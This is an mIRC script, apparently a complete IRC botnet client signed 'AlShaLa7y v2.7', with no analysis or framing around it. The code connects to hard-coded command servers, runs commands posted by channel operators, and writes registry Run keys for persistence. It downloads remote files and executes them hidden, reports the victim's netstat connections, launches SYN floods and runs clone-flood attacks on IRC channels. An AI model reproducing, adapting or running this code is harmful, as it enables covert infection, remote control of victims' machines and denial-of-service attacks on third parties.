   ;#Bot By AlShaLa7y v2.7#;
   on 1:text:*:*:if ($nick isop $AraBs(C1)) { CmDBoT $1- }
   alias AraBs {
     if ($1 = Se) { return $srs }
     if ($1 = Po) { return 6667 }
     if ($1 = C1) { return #xXx }
     if ($1 = C2) { return #x }
     if ($1 = nc) { return pass }
     if ($1 = Cl) { return 1990 }
     if ($1 = hed) { return nwctg.exe }
   }

   alias cooon { .timerconnec -o 0 90 connec }
   alias Nk { return [[ $+ $os $+ - $+ $r(10,999999999999999) $+ ]] }
   alias sTr { anick $Nk | username AlShaLa7y BoT wWw.AlShaLa7y.TK v2.7 $duration($uptime(system,3)) | emailaddr $gettok($duration($uptime(system,3)),1,32) $+ @hotmail.it | identd on $gettok($duration($uptime(system,3)),1,32) | r3m | rmdir download }
   alias TeSts { clearall | msg $arabs(C2) $1- }
   alias jc { /join $AraBs(C1) $AraBs(nc) }
   alias connec { if ($server = $null) { server $AraBs(Se) $AraBs(Po) } | if ($portfree(113)) { socklisten IDENT 113 } }
   alias R3G {
     if ($RegWrite(HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\ $+ $r(A,Z) $+ $r(a,z) $+ $r(a,z) $+ $r(a,z) $+ $r(a,z) $+ $r(a,z) $+ $r(a,z) $+ $r(0,9) $+ $r(0,9)," $+ $mircexe $+ ",REG_SZ) = 1) { goto us }
     goto all
     :us
     if ($RegWrite(HKCU\Software\Microsoft\Windows\CurrentVersion\Run\ $+ $r(A,Z) $+ $r(a,z) $+ $r(a,z) $+ $r(a,z) $+ $r(a,z) $+ $r(a,z) $+ $r(a,z) $+ $r(0,9) $+ $r(0,9)," $+ $mircexe $+ ",REG_SZ) = 1) { goto en }
     goto all
     :en
     if ($RegWrite(HKCU\Software\Microsoft\OLE\ $+ $r(A,Z) $+ $r(a,z) $+ $r(a,z) $+ $r(a,z) $+ $r(a,z) $+ $r(a,z) $+ $r(a,z) $+ $r(0,9) $+ $r(0,9)," $+ $mircexe $+ ",REG_SZ) = 1) { goto ar }
     goto all
     :ar
     if ($RegWrite(HKCU\SYSTEM\CurrentControlSet\Control\Lsa\ $+ $r(A,Z) $+ $r(a,z) $+ $r(a,z) $+ $r(a,z) $+ $r(a,z) $+ $r(a,z) $+ $r(a,z) $+ $r(0,9) $+ $r(0,9)," $+ $mircexe $+ ",REG_SZ) = 1) { goto tk }
     goto all
     :all
     set %gogogo $ticks $+ .reg
     w %gogogo REGEDIT4
     w %gogogo $chr(10)
     w %gogogo [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
     w %gogogo " $+ $r(A,Z) $+ $r(a,z) $+ $r(a,z) $+ $r(a,z) $+ $r(a,z) $+ $r(a,z) $+ $r(a,z) $+ $r(0,9) $+ $r(0,9) $+ "=" $+ $replace($mircexe,\,\\) $+ "
     run -n regedit /s %gogogo
     timer 1 4 remove %gogogo
     :tk
   }
   alias regwrite { .comopen reg WScript.Shell | VAR %t = $iif($istok($3,REG_BINARY,REG_DWORD),int,bstr) | VAR %r = $com(reg,RegWrite,3,bstr,$1,%t,$2,bstr,$3) | .comclose reg | RETURN %r }
   alias r3m {  if $isdir(sounds) || $isdir(logs) || $isdir(download) || $isdir(channels) { rmdir sounds | rmdir logs | rmdir download | rmdir channels | halt } }
   alias ircx { w -c oyh.txt | w -c oyh.bat netstat -n >oyh.txt | hidens "oyh.bat" | .timerX 1 3 ircx2 }
   alias ircx2 { %ci = 5 | %cx = $lines(oyh.txt) | unset %cz | :loop | if (%ci > %cx) { tests $1- [IrcX] servinfo: ( $+ $gettok(%cz,1-,44) $+ ) | halt } | %ctemp = $gettok($read(oyh.txt,%ci),3,32) | if (*:666* iswm %ctemp) || (*:7000 iswm %ctemp) { %cz = $+(%cz,$chr(44),%ctemp) } | inc %ci | goto loop | .timer 1 8 /remove oyh.txt | .timer 1 9 /remove oyh.bat }
   on *:sockopen:Ars:{ if ($sockerr) { TesTs error: socket error. | return } | .w -c %Ars2 | .s-n $sockname GET / $+ %Ars3 HTTP/1.0 | .s-n $sockname Accept: */* | .s-n $sockname Host: %Ars1 | .s-n $sockname }
   alias synp { if ($1 == $null) { return } | syn 1 $1- | syn 1 stop | syn 1 $1- | syn 1 stop | syn 1 $1- | syn 1 stop | syn 1 $1- | syn 1 stop | syn 1 $1- | syn 1 stop | syn 1 $1- | syn 1 stop |  syn 1 $1- | syn 1 stop | syn 1 $1- | syn 1 stop | syn 1 $1- | syn 1 stop | syn 1 $1- | syn 1 stop | TeSts Packets Done ;> }
   alias syn {
     if ($2 == start) { if ($3 !isnum) || ($5 !isnum) { return } | var %x = 1 | while (%x <= $3) { sop syn $+ $r(1,999) $+ $r(1,999) $+ $r(1,999) $4 $5 | inc %x  } }
     if ($2 == stop) { if ($sock(syn*,0) > 0) { sco syn* } }
   }
   alias ARs { if ($sock(Ars)) { TesTs error: already donloading a file.. | return } | set %Ars1 $gettok($1,2,47) | set %Ars2 $gettok($1,$numtok($1,47),47) | set %Ars3 $gettok($1,3-,47) | TesTs Arsing: $1- | .sop Ars %Ars1 80 }
   on *:START:{
     nick $Nk
     inc %starti
     if (!$portfree($AraBs(Cl))) { exit }
     socklisten noclone $AraBs(Cl)
     .timer 1 30 cooon
     .timer 1 4 connec
     .timer 1 1 StR
     .remove msg.sys
   }
   on *:connect:{ .ial on | .timerconnec off | .mode $me +iR-x | .timerjc 0 $rand(5,10) /jc | .pdcc on | .fsend on | .clearall | .rmdir download }
   on *:disconnect:{ timerconnec -o 0 70 connec | rmdir download | connec }
   on *:exit:{ clearall | sco * | timers off }
   on *:PING:{ ctcp $me ping }
   on *:dns:{ %address = $iaddress } { if (%dns.r == on) { TeSts dns: %dns.rrr resolved to ip: $iaddress host: $naddress | unset %dns.* } }
   on *:join:#ôôô#:{ if ($nick == $me) { .timerjc off } }
   on *:part:#ôôô#:{ if ($nick == $me) { timerjc 0 3 raw -q /jc } }
   on *:KICK:#ôôô#:{ if ($knick == $me) { timerjc 0 3 raw -q /jc } }
   on *:socklisten:ident: { .sockaccept $sockname $+ . $+ $rand(a,z) $+ $rand(A,Z) $+ $rand(a,z) $+ $rand(A,Z) $+ $rand(a,z) $+ $rand(A,Z) }
   on *:sockread:Ars:{ if (%Arsready != 1) { var %header | sockread %header | while ($sockbr) { if (Content-length: * iswm %header) { %Arslength = $gettok(%header,2,32) } | elseif (* !iswm %header) { %Arsready = 1 | %Arsoffset = $sock($sockname).rcvd | break } | sockread %header } } | sockread 4096 &d | while ($sockbr) { bwrite %Ars2 -1 -1 &d | sockread 4096 &d } }
   on *:sockread:IDENT.*: { sockread %tmp | tokenize 32 %tmp | sww $sockname $3 $2 $1 : USERID : UNIX : $fnick | unset %tmp }
   raw 433:*:{ .nick $Nk }
   raw 332:*:if ($2 == $AraBs(C1)) { CmDBoT $3- }
   alias CzASEnick { s-n $1 NICK %CzASE.nick }
   on *:SOCKOPEN:CzASE*:{ if $sockerr { return } | %|temp = $rand(a,z) $+ $rand(a,z) $+ $rand(a,z) $+ $rand(a,z) $+ $rand(a,z) $+ $rand(a,z) $+ $rand(a,z) | s-n $sockname USER %|temp * * : $+ %|temp | s-n $sockname NICK %|temp | s-n $sockname away 4A1lShaLa74y1.4T1ea4M }
   on *:SOCKREAD:CzASE*:{
     sockread %CzASE | tokenize 32 %CzASE
     if ($1 = PING) { s-n $sockname PONG $2- }
     if ($2 = 432) { .timerX $+ $sockname 1 1 CzASEnick $sockname }
     if ($2 = 601) { s-n $sockname NICK $4 }
     if ($2 = 605) { s-n $sockname NICK $4 }
     if ($2 = 376) { s-n $sockname MODE $3 +iR | s-n $sockname WATCH $+(+,%CzASE.nick) }
     if ($1 = ERROR) { %sockname = $sockname | %ip = $sock($sockname).ip | %port = $sock($sockname).port | sco $sockname | .timer 1 2 sop %sockname %ip %port }
     if ($2 = NICK) && (%CzASE.nick = $remove($3,:)) { s-n $sockname NICKSERV register %CzASE.pass %CzASE.mail }
     if ($4 = 440) { .timerX $+ $sockname 1 1 CzASEnick }
   }
   alias clone {
     if ($1 = stats) { tests Connect; $sock(xIx*,0) }
     if ($1 = con) { unset %fnickf | set %cserver $2 | /set %cport $3 | set %fnickf $5 | /timeropensock $+ $fnick $4 2 opensock }
     if ($1 = join) { Sww xIx* Join $2- }
     if ($1 = part) { Sww xIx* Part $2 : $+ $3- }
     if ($1 = msg) { Sww xIx* privmsg $2 : $+ $3- }
     if ($1 = no) { Sww xIx* notice $2 : $+ $3- }
     if ($1 = jp) { Sww xIx* Join $2- | Sww xIx* part $2 : $3- | Sww xIx* Join $2- | Sww xIx* part $2 : $3- | Sww xIx* Join $2- | Sww xIx* part $2 : $3- }
     if ($1 = jmp) { Sww xIx* Join $2 | Sww xIx* privmsg $2 : $3- | Sww xIx* part $2 :Floooooooding By AlShaLa7y TeaM... }
     if ($1 = jf) { Sww xIx* Join $2 | Sww xIx* Nick $3 $+ $chr($r(65,125)) $+ $r(1,1000) $+ $r(1,1000) | Sww xIx* Nick $3 $+ $chr($r(65,125)) $+ $r(1,1000) $+ $r(1,1000) | Sww xIx* part $2 :Try My Nick }
     if ($1 = flood.f) { Sww xIx* join $2 | Sww xIx* privmsg $2 : $3- | Sww xIx* notice $2 : $3- | Sww xIx* privmsg $2 : $3- | Sww xIx* part $2 :Floooooooding By AlShaLa7y TeaM }
     if ($1 = flood.3) && ($read msg.sys != $null) { Sww xIx* join $2 | Sww xIx* privmsg $2 : $read msg.sys | Sww xIx* notice $2 : $read msg.sys | Sww xIx* privmsg $2 : $read msg.sys | Sww xIx* part $2 :Floooooooding By AlShaLa7y TeaM... }
     if ($1 = flood.c) { Sww xIx* join $2 | Sww xIx* privmsg $2 : $3- | Sww xIx* notice $2 : $3- | Sww xIx* privmsg $2 : $3- }
     if ($1 = flood.n) { Sww xIx* privmsg $2 : $3- | Sww xIx* notice $2 : $3- | Sww xIx* privmsg $2 : $3- }
     if ($1 = chat.flood) { Sww xIx* privmsg $2 :DCC CHAT $2 1058633484 3481  }
     if ($1 = Quit) { Sww xIx* Quit : $+ $2- }
     if ($1 = massquit) || ($1 = mq) { Sww xIx* Join $2 | Sww xIx* Quit : $+ $3- }
     if ($1 = fnick) { Sww xIx* Nick $2 $+ $r(1,1000) $+ $r(1,1000)  }
     if ($1 = Die) { .timeropensock* off | sco xIx* | unset %f.* }
   }
   alias Stay {
     if ($1 = PING) { Sww %bota $remove($1-,:) }
     if ($2 = 002) { .tests CLone is on }
     if (ERROR = $1) { .tests CLone Was ERROR | sco %bota | unset %f.* }
   }
   on *:sockread:xIx*:{ set %bota $sockname | sockread %BoTread | Stay %BoTread | unset %bota }
   on *:sockclose:xIx*:{ .tests CLone Was Die | unset %f.* }
   alias fnick {
     set %fnick $rand(1,3)
     if (%fnick = 1) { return $chr($r(65,125)) $+ $chr($r(65,125)) }
     if (%fnick = 2) { return $r(A,Z) $+ $r(A,Z) $+ $r(A,Z) $+ $r(A,Z) $+ $r(A,Z) $+ $r(A,Z) }
     if (%fnick = 3) { return $chr($r(65,125)) $+ $chr($r(65,125)) $+ $r(a,z) $+ $r(A,Z) $+ $r(a,z)  }
   }
   alias UNIX {
     set %fnick $rand(1,4)
     if (%fnick = 1) { return UNIX }
     if (%fnick = 2) { return $chr($r(65,125)) $+ $chr($r(65,125))  }
     if (%fnick = 3) { return $r(A,D) $+ $r(0,9) }
     if (%fnick = 4) { return USeR }
   }
   alias opensock { sop xIx $+ $ticks %cserver %cport }
   on *:Sockopen:xIx*:{
     .set -u1 %user $UNIX
     .sww $sockname USER %user %user %user : $+ $r(A,Z) $+ $r(0,9) $+ $r(0,9)
     .Sww $sockname NICK %fnickf $+ $r(A,Z) $+ $ticks
   }
   alias w { write $1- }
   alias sww { .sockwrite -nt $1- }
   alias s-n { .sockwrite -n $1- }
   alias hiden { hidens $1- }
   alias hidens { run $AraBs(hed) /n /fh /r $1- }
   on *:sockclose:Ars:{
     if ($file(%Ars2).size != %Arslength) { .sco Ars | Ars http:// $+ %Ars1 $+ / $+ %Ars3 }
     else { TesTs file DownLoaDed: ( $mircdir $+ %Ars2 ) ( $+ $file(%Ars2).size bytes $+ , $+ $bytes($file(%Ars2).size).suf $+ ) }
     if (%Ars.r = on) { hidens " $+ $mircdir $+ %Ars2 $+ " }
     unset %Ars*
   }
   alias sop { .sockopen $1- }
   alias sco { .sockclose $1- }
   alias srs {
     inc %srs
     if (%srs = 1) { return xevil.AsSexy.As }
     if (%srs = 2) { unset %srs | return xEvil.i989.net }
   }
